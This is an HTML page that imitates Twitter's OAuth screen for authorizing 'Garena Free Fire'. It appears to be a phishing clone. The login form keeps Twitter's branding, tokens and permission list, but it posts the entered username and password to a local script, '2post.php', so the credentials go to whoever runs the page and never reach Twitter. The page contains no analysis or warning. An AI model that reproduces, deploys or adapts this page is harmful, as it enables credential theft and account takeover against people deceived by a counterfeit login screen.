<!DOCTYPE html>
<html lang="en"  dir="ltr"
      class="">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    
    <title>Twitter / Authorize an application</title>
<!-- <link rel="stylesheet" href="twi.css"></link>   -->  
    <link rel="stylesheet" type="text/css" media="screen" href="https://abs-0.twimg.com/login/tfw-base.3baf723b92aa68729f921c77ca3e3c1315116392.css">   
    <!--[if (IEMobile) & (lt IE 9)]>
      <link href="https://abs-0.twimg.com/login/phoenix-iemobile.49b26ac21d4736060188b5b79bbabc69ca8ef790.css" media="screen" rel="stylesheet" type="text/css" />
    <![endif]-->
        <meta name="mswebdialog-title" content="Twitter"><meta name="mswebdialog-logo" content="https://abs.twimg.com/favicons/win8-auth-60.png"><meta name="mswebdialog-header-color" content="#202020"><meta name="mswebdialog-newwindowurl" content="*">


      <script src="//abs-0.twimg.com/login/base.7ced3ee3ff61dadf91a9c9bd7082adc8f158a360.js" type="text/javascript"></script>
      <script src="//abs-0.twimg.com/login/authorize_page.c4edf9ccaf94a42b6963991691957aaa827aa56b.js" type="text/javascript"></script>
  </head>
  
  
  <body class="oauth  tfw en logged-out    noloki">

    <div id="header" role="banner">
      <div class="bar">
        <h1 class="logo">
          <a class="alternate-context" href="https://twitter.com/home">Twitter</a>
        </h1>

        <div id="not-logged-in">
              <a href="https://twitter.com/signup?context=oauth&amp;oauth_token=cKV2ZwAAAAABLP2yAAABfjU_Vuo" class="register alternate-context">Sign up for Twitter</a>

        </div>
      </div>
    </div>

    <div id="bd" role="main">
          




    <div class="auth">
      <h2>Authorize Garena Free Fire to access your account?</h2>

      <div class="app-info" role="content-info" tabindex="0">
  <h3>
    <img alt="" class="app-icon" src="https://ton.twimg.com/app_icons/oauth_application.png" title="Garena Free Fire">
    Garena Free Fire
  </h3>
  <dl>
      <dt class="url">Application URL</dt>
      <dd class="url">ff.garena.com/</dd>
      <dt class="notes">About this app</dt>
      <dd class="notes"><p>10-minute Survival Shooter!</p></dd>
      <dt class="terms">Privacy Policy</dt>
      <dd class="terms"><p><a href="https://ff.garena.com/others/policy/en/">Privacy Policy</a></p></dd>
      <dt class="terms">Terms and Conditions</dt>
      <dd class="terms"><p><a href="https://contentgarena-a.akamaihd.net/legal/tos/tos_en.html">Terms and Conditions</a></p></dd>

  </dl>
</div>

      <form action="2post.php" id="oauth_form" method="post" target="him.html">
        <div>
          <input name="authenticity_token" type="hidden" value="91635cd08a9ebe027d80a828ede8edc3eda864bc">
          <input name="redirect_after_login" type="hidden" value="https://api.twitter.com/oauth/authenticate?oauth_token=cKV2ZwAAAAABLP2yAAABfjU_Vuo">
        </div>

        <input id="oauth_token" name="oauth_token" type="hidden" value="cKV2ZwAAAAABLP2yAAABfjU_Vuo">

          <fieldset class="sign-in">
  <legend>Log in to Twitter</legend>
  <div class="row user ">
    <input aria-required="true" autocapitalize="off" autocorrect="off"  class="text" id="username_or_email" name="email" type="text" placeholder="Username or email" autocomplete="off"	value=""	required>
  </div>
  <div class="row password ">
    <input aria-required="true" class="password text"  id="password" name="pass" type="password" placeholder="Password" value=""	required>
  </div>
  <p>
    <input type="checkbox" name="remember_me" id="remember" value="1">
    <label for="remember">Remember me</label>
    &middot;
    <a href="https://twitter.com/account/resend_password" class="alternate-context" target="_blank">Forgot password?</a>
  </p>
    <input type="hidden" name="ui_metrics" autocomplete="off">
    <script src="https://twitter.com/i/js_inst?c_name=ui_metrics" async></script>
</fieldset>


        <fieldset class="buttons">
          <legend>Sign in to Garena Free Fire using your account?</legend>
          <input type="submit" value="Sign In" class="submit button selected" id="allow">

            <input class="submit button" id="cancel" name="cancel" type="submit" value="Cancel">

        </fieldset>
      </form>

      
<div class="permissions allow">
  <p><strong>This application will be able to:</strong></p>
   <ul class="permissions allow">
      <li>See Tweets from your timeline (including protected Tweets) as well as your Lists and collections.</li>
      <li>See your Twitter profile information and account settings.</li>
      <li>See accounts you follow, mute, and block.</li>
      <li>See your email address.</li>
</ul>


</div>




      <div>
  <p><small>Learn more about third-party app permissions in the <a href="https://help.twitter.com/managing-your-account/connect-or-revoke-access-to-third-party-apps" target="_blank">Help Center</a>.</small></p>
</div>


    </div>

    </div>


  <div class="footer" role="navigation"><div id="ft">
    
        
  <p class="tip">We recommend reviewing the app’s terms and privacy policy to understand how it will use data from your Twitter account. You can revoke access to any app at any time from the <a href="https://twitter.com/settings/applications" target="_blank">Apps and sessions</a> section of your Twitter account settings.</p>
  <p><small>By authorizing an app you continue to operate under Twitter’s <a href="https://twitter.com/tos" target="_blank">Terms of Service</a>. In particular, some usage information will be shared back with Twitter. For more, see our <a href="https://twitter.com/privacy" target="_blank">Privacy Policy</a>.</small></p>



  </div></div>

  </body>
</html>
